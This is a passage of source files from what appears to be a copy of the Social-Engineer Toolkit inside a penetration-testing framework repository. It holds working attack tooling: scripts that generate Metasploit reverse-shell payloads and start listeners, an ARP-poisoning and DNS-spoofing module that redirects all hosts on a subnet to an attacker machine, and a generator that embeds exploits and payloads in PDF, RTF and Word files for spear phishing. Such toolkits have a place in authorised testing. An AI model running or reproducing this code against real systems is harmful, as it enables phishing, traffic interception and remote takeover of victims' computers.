"Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload = (raw_input(setprompt(["4"], "")))
# if its default then select meterpreter
if payload == "":
payload = "2"
# assign the right payload
payload = ms_payload(payload)
lhost = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
port = raw_input(setprompt(["4"], "Enter the PORT for the reverse listener"))
# print to user that payload is being generated
print_status("Generating the payload.. please be patient.")
# generate the actual payload
payload_generate(payload, lhost, port)
# check options to see if we are using the infectious media generator
if check_options("INFECTION_MEDIA=") != "ON":
# start the payload for the user
payload_query = raw_input(setprompt(
["4"], "Do you want to start the payload and listener now? (yes/no)"))
if payload_query.lower() == "y" or payload_query.lower() == "yes":
print_status(
"Launching msfconsole, this could take a few to load. Be patient...")
subprocess.Popen(meta_path + "msfconsole -r " +
userconfigpath + "meta_config", shell=True).wait()
| 2,183 | Python | .py | 46 | 43.152174 | 142 | 0.701079 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,847 | setssl.py | CHEGEBB_africana-framework/externals/set/src/core/ssl/setssl.py | #!/usr/bin/env python3
#
# Quick SSL Cert creation method
#
# Used if you want to create self signed
from src.core.setcore import *
import subprocess
import os
definepath = os.getcwd()
os.chdir(userconfigpath)
# create the directories for us
subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait()
# move into CA directory
os.chdir("CA/")
# create necessary files
subprocess.Popen("echo '01' > serial;touch index.txt", shell=True).wait()
filewrite = open("openssl.cnf", "w")
filewrite.write("""#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
[ req ]
default_bits = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
# Variable name Prompt string
#---------------------- ----------------------------------
0.organizationName = Organization Name (company)
organizationalUnitName = Organizational Unit Name (department, division)
emailAddress = Email Address
emailAddress_max = 40
localityName = Locality Name (city, district)
stateOrProvinceName = State or Province Name (full name)
countryName = Country Name (2 letter code)
countryName_min = 2
countryName_max = 2
commonName = Common Name (hostname, IP, or your name)
commonName_max = 64
# Default values for the above, for consistency and less typing.
# Variable name Value
#------------------------------ ------------------------------
0.organizationName_default = The Sample Company
localityName_default = Metropolis
stateOrProvinceName_default = New York
countryName_default = US
[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always""")
# close editing of the file
filewrite.close()
subprocess.Popen(
"openssl req -new -x509 -extensions v3_ca -keyout private/cakey.pem -out newcert.pem -days 3650 -config ./openssl.cnf", shell=True).wait()
subprocess.Popen(
"cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait()
os.chdir(definepath)
| 2,111 | Python | .py | 60 | 33.966667 | 142 | 0.737537 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,848 | PoC_SSL.py | CHEGEBB_africana-framework/externals/set/src/core/ssl/PoC_SSL.py | #!/usr/bin/env python3
import socket
import os
from socketserver import BaseServer
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
from OpenSSL import SSL
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
BaseServer.__init__(self, server_address, HandlerClass)
ctx = SSL.Context(SSL.SSLv23_METHOD)
# server.pem's location (containing the server private key and
# the server certificate).
fpem_priv = 'newreq.pem' # server
fpem_cli = 'newcert.pem' # cli
ctx.use_privatekey_file(fpem_priv)
ctx.use_certificate_file(fpem_cli)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family,
self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request): request.shutdown()
class SecureHTTPRequestHandler(SimpleHTTPRequestHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
def main_server(HandlerClass=SecureHTTPRequestHandler,
ServerClass=SecureHTTPServer):
server_address = ('', 443) # (address, port)
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
print("Serving HTTPS on", sa[0], "port", sa[1], "...")
if __name__ == '__main__':
main_server()
| 1,559 | Python | .py | 35 | 37.085714 | 76 | 0.674373 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,849 | socket.py | CHEGEBB_africana-framework/externals/set/src/core/patched/socket.py | # Wrapper module for _socket, providing some additional facilities
# implemented in Python.
"""\
This module provides socket operations and some related functions.
On Unix, it supports IP (Internet Protocol) and Unix domain sockets.
On other systems, it only supports IP. Functions specific for a
socket are available as methods of the socket object.
Functions:
socket() -- create a new socket object
socketpair() -- create a pair of new socket objects [*]
fromfd() -- create a socket object from an open file descriptor [*]
gethostname() -- return the current hostname
gethostbyname() -- map a hostname to its IP number
gethostbyaddr() -- map an IP number or hostname to DNS info
getservbyname() -- map a service name and a protocol name to a port number
getprotobyname() -- map a protocol name (e.g. 'tcp') to a number
ntohs(), ntohl() -- convert 16, 32 bit int from network to host byte order
htons(), htonl() -- convert 16, 32 bit int from host to network byte order
inet_aton() -- convert IP addr string (123.45.67.89) to 32-bit packed format
inet_ntoa() -- convert 32-bit packed format IP to string (123.45.67.89)
ssl() -- secure socket layer support (only available if configured)
socket.getdefaulttimeout() -- get the default timeout value
socket.setdefaulttimeout() -- set the default timeout value
create_connection() -- connects to an address, with an optional timeout and
optional source address.
[*] not available on all platforms!
Special objects:
SocketType -- type object for socket objects
error -- exception raised for I/O errors
has_ipv6 -- boolean value indicating if IPv6 is supported
Integer constants:
AF_INET, AF_UNIX -- socket domains (first argument to socket() call)
SOCK_STREAM, SOCK_DGRAM, SOCK_RAW -- socket types (second argument)
Many other constants may be defined; these may be used in calls to
the setsockopt() and getsockopt() methods.
"""
import _socket
from _socket import *
from functools import partial
from types import MethodType
try:
import _ssl
except ImportError:
# no SSL support
pass
else:
def ssl(sock, keyfile=None, certfile=None):
# we do an internal import here because the ssl
# module imports the socket module
import ssl as _realssl
warnings.warn("socket.ssl() is deprecated. Use ssl.wrap_socket() instead.",
DeprecationWarning, stacklevel=2)
return _realssl.sslwrap_simple(sock, keyfile, certfile)
# we need to import the same constants we used to...
from _ssl import SSLError as sslerror
from _ssl import \
RAND_add, \
RAND_egd, \
RAND_status, \
SSL_ERROR_ZERO_RETURN, \
SSL_ERROR_WANT_READ, \
SSL_ERROR_WANT_WRITE, \
SSL_ERROR_WANT_X509_LOOKUP, \
SSL_ERROR_SYSCALL, \
SSL_ERROR_SSL, \
SSL_ERROR_WANT_CONNECT, \
SSL_ERROR_EOF, \
SSL_ERROR_INVALID_ERROR_CODE
import os, sys, warnings
try:
from io import StringIO
except ImportError:
from io import StringIO
try:
import errno
except ImportError:
errno = None
EBADF = getattr(errno, 'EBADF', 9)
EINTR = getattr(errno, 'EINTR', 4)
__all__ = ["getfqdn", "create_connection"]
__all__.extend(os._get_exports_list(_socket))
_realsocket = socket
# WSA error codes
if sys.platform.lower().startswith("win"):
errorTab = {}
errorTab[10004] = "The operation was interrupted."
errorTab[10009] = "A bad file handle was passed."
errorTab[10013] = "Permission denied."
errorTab[10014] = "A fault occurred on the network??" # WSAEFAULT
errorTab[10022] = "An invalid operation was attempted."
errorTab[10035] = "The socket operation would block"
errorTab[10036] = "A blocking operation is already in progress."
errorTab[10048] = "The network address is in use."
errorTab[10054] = "The connection has been reset."
errorTab[10058] = "The network has been shut down."
errorTab[10060] = "The operation timed out."
errorTab[10061] = "Connection refused."
errorTab[10063] = "The name is too long."
errorTab[10064] = "The host is down."
errorTab[10065] = "The host is unreachable."
__all__.append("errorTab")
def getfqdn(name=''):
"""Get fully qualified domain name from name.
An empty argument is interpreted as meaning the local host.
First the hostname returned by gethostbyaddr() is checked, then
possibly existing aliases. In case no FQDN is available, hostname
from gethostname() is returned.
"""
name = name.strip()
if not name or name == '0.0.0.0':
name = gethostname()
try:
hostname, aliases, ipaddrs = gethostbyaddr(name)
except error:
pass
else:
aliases.insert(0, hostname)
for name in aliases:
if '.' in name:
break
else:
name = hostname
return name
_socketmethods = (
'bind', 'connect', 'connect_ex', 'fileno', 'listen',
'getpeername', 'getsockname', 'getsockopt', 'setsockopt',
'sendall', 'setblocking',
'settimeout', 'gettimeout', 'shutdown')
if os.name == "nt":
_socketmethods = _socketmethods + ('ioctl',)
if sys.platform == "riscos":
_socketmethods = _socketmethods + ('sleeptaskw',)
# All the method names that must be delegated to either the real socket
# object or the _closedsocket object.
_delegate_methods = ("recv", "recvfrom", "recv_into", "recvfrom_into",
"send", "sendto")
class _closedsocket(object):
__slots__ = []
def _dummy(*args):
raise error(EBADF, 'Bad file descriptor')
# All _delegate_methods must also be initialized here.
send = recv = recv_into = sendto = recvfrom = recvfrom_into = _dummy
__getattr__ = _dummy
# Wrapper around platform socket objects. This implements
# a platform-independent dup() functionality. The
# implementation currently relies on reference counting
# to close the underlying socket object.
class _socketobject(object):
__doc__ = _realsocket.__doc__
__slots__ = ["_sock", "__weakref__"] + list(_delegate_methods)
def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, _sock=None):
if _sock is None:
_sock = _realsocket(family, type, proto)
self._sock = _sock
for method in _delegate_methods:
setattr(self, method, getattr(_sock, method))
def close(self, _closedsocket=_closedsocket,
_delegate_methods=_delegate_methods, setattr=setattr):
# This function should not reference any globals. See issue #808164.
self._sock = _closedsocket()
dummy = self._sock._dummy
for method in _delegate_methods:
setattr(self, method, dummy)
close.__doc__ = _realsocket.close.__doc__
def accept(self):
sock, addr = self._sock.accept()
return _socketobject(_sock=sock), addr
accept.__doc__ = _realsocket.accept.__doc__
def dup(self):
"""dup() -> socket object
Return a new socket object connected to the same system resource."""
return _socketobject(_sock=self._sock)
def makefile(self, mode='r', bufsize=-1):
"""makefile([mode[, bufsize]]) -> file object
Return a regular file object corresponding to the socket. The mode
and bufsize arguments are as for the built-in open() function."""
return _fileobject(self._sock, mode, bufsize)
family = property(lambda self: self._sock.family, doc="the socket family")
type = property(lambda self: self._sock.type, doc="the socket type")
proto = property(lambda self: self._sock.proto, doc="the socket protocol")
def meth(name,self,*args):
return getattr(self._sock,name)(*args)
for _m in _socketmethods:
p = partial(meth,_m)
p.__name__ = _m
p.__doc__ = getattr(_realsocket,_m).__doc__
m = MethodType(p,None,_socketobject)
setattr(_socketobject,_m,m)
socket = SocketType = _socketobject
class _fileobject(object):
"""Faux file object attached to a socket object."""
default_bufsize = 8192
name = "<socket>"
__slots__ = ["mode", "bufsize", "softspace",
# "closed" is a property, see below
"_sock", "_rbufsize", "_wbufsize", "_rbuf", "_wbuf", "_wbuf_len",
"_close"]
def __init__(self, sock, mode='rb', bufsize=-1, close=False):
self._sock = sock
self.mode = mode # Not actually used in this version
if bufsize < 0:
bufsize = self.default_bufsize
self.bufsize = bufsize
self.softspace = False
# _rbufsize is the suggested recv buffer size. It is *strictly*
# obeyed within readline() for recv calls. If it is larger than
# default_bufsize it will be used for recv calls within read().
if bufsize == 0:
self._rbufsize = 1
elif bufsize == 1:
self._rbufsize = self.default_bufsize
else:
self._rbufsize = bufsize
self._wbufsize = bufsize
# We use StringIO for the read buffer to avoid holding a list
# of variously sized string objects which have been known to
# fragment the heap due to how they are malloc()ed and often
# realloc()ed down much smaller than their original allocation.
self._rbuf = StringIO()
self._wbuf = [] # A list of strings
self._wbuf_len = 0
self._close = close
def _getclosed(self):
return self._sock is None
closed = property(_getclosed, doc="True if the file is closed")
def close(self):
try:
if self._sock:
self.flush()
finally:
if self._close:
self._sock.close()
self._sock = None
def __del__(self):
try:
self.close()
except:
# close() may fail if __init__ didn't complete
pass
def flush(self):
if self._wbuf:
data = "".join(self._wbuf)
self._wbuf = []
self._wbuf_len = 0
buffer_size = max(self._rbufsize, self.default_bufsize)
data_size = len(data)
write_offset = 0
view = memoryview(data)
try:
while write_offset < data_size:
self._sock.sendall(view[write_offset:write_offset+buffer_size])
write_offset += buffer_size
finally:
if write_offset < data_size:
remainder = data[write_offset:]
del view, data # explicit free
self._wbuf.append(remainder)
self._wbuf_len = len(remainder)
def fileno(self):
return self._sock.fileno()
def write(self, data):
data = str(data) # XXX Should really reject non-string non-buffers
if not data:
return
self._wbuf.append(data)
self._wbuf_len += len(data)
if (self._wbufsize == 0 or
self._wbufsize == 1 and '\n' in data or
self._wbuf_len >= self._wbufsize):
self.flush()
def writelines(self, list):
# XXX We could do better here for very long lists
# XXX Should really reject non-string non-buffers
lines = [_f for _f in map(str, list) if _f]
self._wbuf_len += sum(map(len, lines))
self._wbuf.extend(lines)
if (self._wbufsize <= 1 or
self._wbuf_len >= self._wbufsize):
self.flush()
def read(self, size=-1):
# Use max, disallow tiny reads in a loop as they are very inefficient.
# We never leave read() with any leftover data from a new recv() call
# in our internal buffer.
rbufsize = max(self._rbufsize, self.default_bufsize)
# Our use of StringIO rather than lists of string objects returned by
# recv() minimizes memory usage and fragmentation that occurs when
# rbufsize is large compared to the typical return value of recv().
buf = self._rbuf
buf.seek(0, 2) # seek end
if size < 0:
# Read until EOF
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
try:
data = self._sock.recv(rbufsize)
except error as e:
if e.args[0] == EINTR:
continue
raise
if not data:
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or EOF seen, whichever comes first
buf_len = buf.tell()
if buf_len >= size:
# Already have size bytes in our buffer? Extract and return.
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
left = size - buf_len
# recv() will malloc the amount of memory given as its
# parameter even though it often returns much less data
# than that. The returned data string is short lived
# as we copy it into a StringIO and free it. This avoids
# fragmentation issues on many platforms.
try:
data = self._sock.recv(left)
except error as e:
if e.args[0] == EINTR:
continue
raise
if not data:
break
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid buffer data copies when:
# - We have no data in our buffer.
# AND
# - Our call to recv returned exactly the
# number of bytes we were asked to read.
return data
if n == left:
buf.write(data)
del data # explicit free
break
assert n <= left, "recv(%d) returned %d bytes" % (left, n)
buf.write(data)
buf_len += n
del data # explicit free
#assert buf_len == buf.tell()
return buf.getvalue()
def readline(self, size=-1):
buf = self._rbuf
buf.seek(0, 2) # seek end
if buf.tell() > 0:
# check if we already have it in our buffer
buf.seek(0)
bline = buf.readline(size)
if bline.endswith('\n') or len(bline) == size:
self._rbuf = StringIO()
self._rbuf.write(buf.read())
return bline
del bline
if size < 0:
# Read until \n or EOF, whichever comes first
if self._rbufsize <= 1:
# Speed up unbuffered case
buf.seek(0)
buffers = [buf.read()]
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
data = None
recv = self._sock.recv
while True:
try:
while data != "\n":
data = recv(1)
if not data:
break
buffers.append(data)
except error as e:
# The try..except to catch EINTR was moved outside the
# recv loop to avoid the per byte overhead.
if e.args[0] == EINTR:
continue
raise
break
return "".join(buffers)
buf.seek(0, 2) # seek end
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
try:
data = self._sock.recv(self._rbufsize)
except error as e:
if e.args[0] == EINTR:
continue
raise
if not data:
break
nl = data.find('\n')
if nl >= 0:
nl += 1
buf.write(data[:nl])
self._rbuf.write(data[nl:])
del data
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or \n or EOF seen, whichever comes first
buf.seek(0, 2) # seek end
buf_len = buf.tell()
if buf_len >= size:
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
data = ""
try:
data = self._sock.recv(self._rbufsize)
except:
#if e.args[0] == EINTR:
# continue
#raise
pass
if not data:
break
left = size - buf_len
# did we just receive a newline?
nl = data.find('\n', 0, left)
if nl >= 0:
nl += 1
# save the excess data to _rbuf
self._rbuf.write(data[nl:])
if buf_len:
buf.write(data[:nl])
break
else:
# Shortcut. Avoid data copy through buf when returning
# a substring of our first recv().
return data[:nl]
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid data copy through buf when
# returning exactly all of our first recv().
return data
if n >= left:
buf.write(data[:left])
self._rbuf.write(data[left:])
break
buf.write(data)
buf_len += n
#assert buf_len == buf.tell()
return buf.getvalue()
def readlines(self, sizehint=0):
total = 0
list = []
while True:
line = self.readline()
if not line:
break
list.append(line)
total += len(line)
if sizehint and total >= sizehint:
break
return list
# Iterator protocols
def __iter__(self):
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
_GLOBAL_DEFAULT_TIMEOUT = object()
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
"""
host, port = address
err = None
for res in getaddrinfo(host, port, 0, SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise error("getaddrinfo returns an empty list")
| 20,536 | Python | .py | 506 | 29.648221 | 84 | 0.560693 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,850 | arp.py | CHEGEBB_africana-framework/externals/set/src/core/arp_cache/arp.py | import subprocess
import re
import pexpect
import os
import time
import sys
from src.core.setcore import *
# Define to use ettercap or dsniff or nothing.
#
# Thanks to sami8007 and trcx for the dsniff addition
definepath = os.getcwd()
# grab config file
config = open("/etc/setoolkit/set.config", "r").readlines()
# grab our default directory
cwd = os.getcwd()
# set a variable as default to n or no
ettercapchoice = 'n'
# add dsniffchoice
dsniffchoice = 'n'
for line in config:
# check for ettercap choice here
match1 = re.search("ETTERCAP=ON", line)
if match1:
print_info("ARP Cache Poisoning is set to " +
bcolors.GREEN + "ON" + bcolors.ENDC)
ettercapchoice = 'y'
# check for dsniff choice here
match2 = re.search("DSNIFF=ON", line)
if match2:
print_info("DSNIFF DNS Poisoning is set to " +
bcolors.GREEN + "ON" + bcolors.ENDC)
dsniffchoice = 'y'
ettercapchoice = 'n'
# GRAB CONFIG from SET
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
# grab the ettercap interface
match = re.search("ETTERCAP_INTERFACE=", line)
if match:
line = line.rstrip()
interface = line.split("=")
interface = interface[1]
if interface == "NONE":
interface = ""
# grab the ettercap path
etterpath = re.search("ETTERCAP_PATH=", line)
if etterpath:
line = line.rstrip()
path = line.replace("ETTERCAP_PATH=", "")
if not os.path.isfile(path):
path = ("/usr/local/share/ettercap")
# if we are using ettercap then get everything ready
if ettercapchoice == 'y':
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
if ettercapchoice == 'y':
try:
print("""
This attack will poison all victims on your local subnet, and redirect them
when they hit a specific website. The next prompt will ask you which site you
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
""")
print_info("Example: http://www.google.com")
dns_spoof = raw_input(
setprompt("0", "Site to redirect to attack machine [*]"))
os.chdir(path)
# small fix for default
if dns_spoof == "":
# set default to * (everything)
dns_spoof = "*"
# remove old stale files
subprocess.Popen(
"rm etter.dns 1> /dev/null 2> /dev/null", shell=True).wait()
# prep etter.dns for writing
filewrite = open("etter.dns", "w")
# send our information to etter.dns
filewrite.write("%s A %s" % (dns_spoof, ipaddr))
# close the file
filewrite.close()
# set bridge variable to nothing
bridge = ""
# assign -M arp to arp variable
arp = "-M arp"
print_error("LAUNCHING ETTERCAP DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
time.sleep(5)
filewrite = open(userconfigpath + "ettercap", "w")
filewrite.write(
"ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge))
filewrite.close()
os.chdir(cwd)
except Exception as error:
os.chdir(cwd)
# log(error)
print_error("ERROR:An error has occured:")
print("ERROR:" + str(error))
# if we are using dsniff
if dsniffchoice == 'y':
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
if dsniffchoice == 'y':
try:
print("""
This attack will poison all victims on your local subnet, and redirect them
when they hit a specific website. The next prompt will ask you which site you
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
""")
print_info("Example: http://www.google.com")
dns_spoof = raw_input(
setprompt("0", "Site to redirect to attack machine [*]"))
# os.chdir(path)
# small fix for default
if dns_spoof == "":
dns_spoof = "*"
subprocess.Popen(
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait()
filewrite = open(userconfigpath + "dnsspoof.conf", "w")
filewrite.write("%s %s" % (ipaddr, dns_spoof))
filewrite.close()
print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
# time.sleep(5)
# grab default gateway, should eventually replace with pynetinfo
# python module
gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % (
interface), shell=True, stdout=subprocess.PIPE).communicate()[0]
# open file for writing
filewrite = open(userconfigpath + "ettercap", "w")
# write the arpspoof / dnsspoof commands to file
filewrite.write(
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath))
# close the file
filewrite.close()
# change back to normal directory
os.chdir(cwd)
# this is needed to keep it similar to format above for web gui
# mode
pause = raw_input("Press <return> to begin dsniff.")
except Exception as error:
os.chdir(cwd)
print_error("ERROR:An error has occurred:")
print(bcolors.RED + "ERROR" + str(error) + bcolors.ENDC)
| 6,690 | Python | .py | 162 | 32.537037 | 102 | 0.603562 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,851 | msf_list.py | CHEGEBB_africana-framework/externals/set/src/core/msf_attacks/msf_list.py | #!/usr/bin/env python3
import re
import subprocess
import sys
import src
from src.core import module_reload
from src.core.setcore import debug_msg, meta_path, mod_name
me = mod_name()
sys.path.append("src/core")
debug_msg(me, "re-importing 'src.core.setcore'", 1)
try:
module_reload(src.core.setcore)
except:
import src.core.setcore
print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
generate_list = subprocess.Popen(
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print("[---] Database is now up-to-date [---]")
| 620 | Python | .py | 18 | 32.666667 | 112 | 0.738333 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,852 | create_payload.py | CHEGEBB_africana-framework/externals/set/src/core/msf_attacks/create_payload.py | #!/usr/bin/python3
# PDF spear phishing attack here
import subprocess
import re
import sys
import os
import socket
import pexpect
import time
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
me = mod_name()
definepath = os.getcwd()
define_version = get_version()
users_home = os.getenv("HOME")
outfile = ("template.pdf")
# metasploit path
meta_path = meta_path()
print(meta_path)
# define if we need apache or not for dll hijacking
# define if use apache or not
apache = 0
# open set_config
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line = line.rstrip()
# if apache is turned on get things ready
match = re.search("APACHE_SERVER=ON", line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2 = re.search("APACHE_DIRECTORY=", line2)
if match2:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
###################################################
# USER INPUT: SHOW PAYLOAD MENU #
###################################################
inputpdf = ""
target = ""
exploit = "INVALID"
while exploit == "INVALID":
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
show_payload_menu1 = create_menu(
create_payloads_text, create_payloads_menu)
exploit = raw_input(setprompt(["4"], ""))
print("\n")
# Do conditional checks for the value of 'exploit', which should be a number
# Handle any additional tasks before doing the dictionary lookup and
# converting the user returned value to the metasploit string
# here we specify if its a pdf or rtf
if exploit == 'exit':
exit_set()
if exploit == "":
# 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
exploit = '1'
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile = ("template.doc")
# 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
if exploit == '4':
outfile = ("template.rtf")
target = ("TARGET=1")
if exploit == "5":
outfile = ("template.mov")
if exploit != '3' and exploit != '4' and exploit != "17":
outfile = ("template.pdf")
debug_msg(me, 'current input was read as: %s' % exploit, 3)
exploit = ms_attacks(exploit)
debug_msg(me, 'value was translated to: %s' % exploit, 3)
if exploit == "INVALID":
print_warning(
"that choice is invalid...please try again or press ctrl-c to Cancel.")
time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info(
"Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print("""
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n""")
choicepdf = raw_input(setprompt(["4"], ""))
if choicepdf == 'exit': exit_set()
if choicepdf == '1':
# define if user wants to use their own pdf or built in one
inputpdf = raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
choicepdf = inputpdf
# if blank, then default to normal pdf
if inputpdf == "":
# change to default SET pdf
print_info("Defaulting to BLANK PDF built into SET...")
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
choicepdf = inputpdf
# if no file exists defalt this
if not os.path.isfile(inputpdf):
print_warning("Unable to find PDF, defaulting to blank PDF.")
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
choicepdf = inputpdf
if choicepdf == '2':
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
if choicepdf == "":
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
exploit_counter = 0
if exploit == "dll_hijacking" or exploit == "unc_embed":
exploit_counter = 1
if exploit_counter == 0:
###################################################
# USER INPUT: SHOW PAYLOAD MENU 3 #
###################################################
debug_msg(me, "printing 'src.core.menu.text.payload_menu_3'", 5)
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
payload = raw_input(setprompt(["4"], ""))
noencode = 0
if payload == 'exit':
exit_set()
if payload == "":
payload = "2"
if payload == '4' or payload == '5' or payload == '6':
noencode = 1
payload = ms_payload_3(payload)
# imported from central, grabs ip address
rhost = grab_ipaddress()
# SET LPORT
lport = raw_input(setprompt(["4"], "Port to connect back on [443]"))
# if blank default to 443
if lport == "":
lport = "443"
print_info("Defaulting to port 443...")
# SET FILE OUTPATH
# /root/.msf4/local/msf.pdf
filename_code = outfile
msfpath = ""
if os.path.isdir(users_home + "/.msf4/"):
msfpath = (users_home + "/.msf4/")
if os.path.isdir(users_home + "/.msf5/"):
# then we know its actually created
if os.path.isdir(users_home + "/.msf5/loot"):
msfpath = (users_home + "/.msf5/")
# if we have never run msf before
if msfpath == "":
print_warning("Metasploit has not been previously run on the system. This means that the msf directories haven't been created yet. Running Metasploit for you.")
child = pexpect.spawn("msfconsole")
print_status("Waiting 10 seconds for the directories to be created...")
time.sleep(10)
child.close()
if os.path.isdir(users_home + "/.msf4"):
print_status("All good! The directories were created.")
msfpath = (users_home + "/.msf4/")
else:
print_error("Please exit out of SET and type 'msfconsole' from the command prompt and launch SET again. Can't find the msf4 directory.")
sys.exit()
outpath = (msfpath + "local/" + outfile)
print_info("Generating fileformat exploit...")
# START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload':
output = userconfigpath + "%s" % (outfile)
if os.path.isfile(userconfigpath + "template.pdf"):
os.remove(userconfigpath + "template.pdf")
if os.path.isfile(msfpath + "local/template.pdf"):
os.remove(msfpath + "local/template.pdf")
if inputpdf != "": inputpdf = ("set INFILENAME " + inputpdf + "\n")
output = output.replace("//", "/")
filewrite = open(userconfigpath + "template.rc", "w")
filewrite.write("use %s\nset LHOST %s\nset LPORT %s\n%sset FILENAME %s\nexploit\n" %
(exploit, rhost, lport, inputpdf, output))
filewrite.close()
child = pexpect.spawn(
"%smsfconsole -r %s/template.rc" % (meta_path, userconfigpath))
a = 1
counter = 0
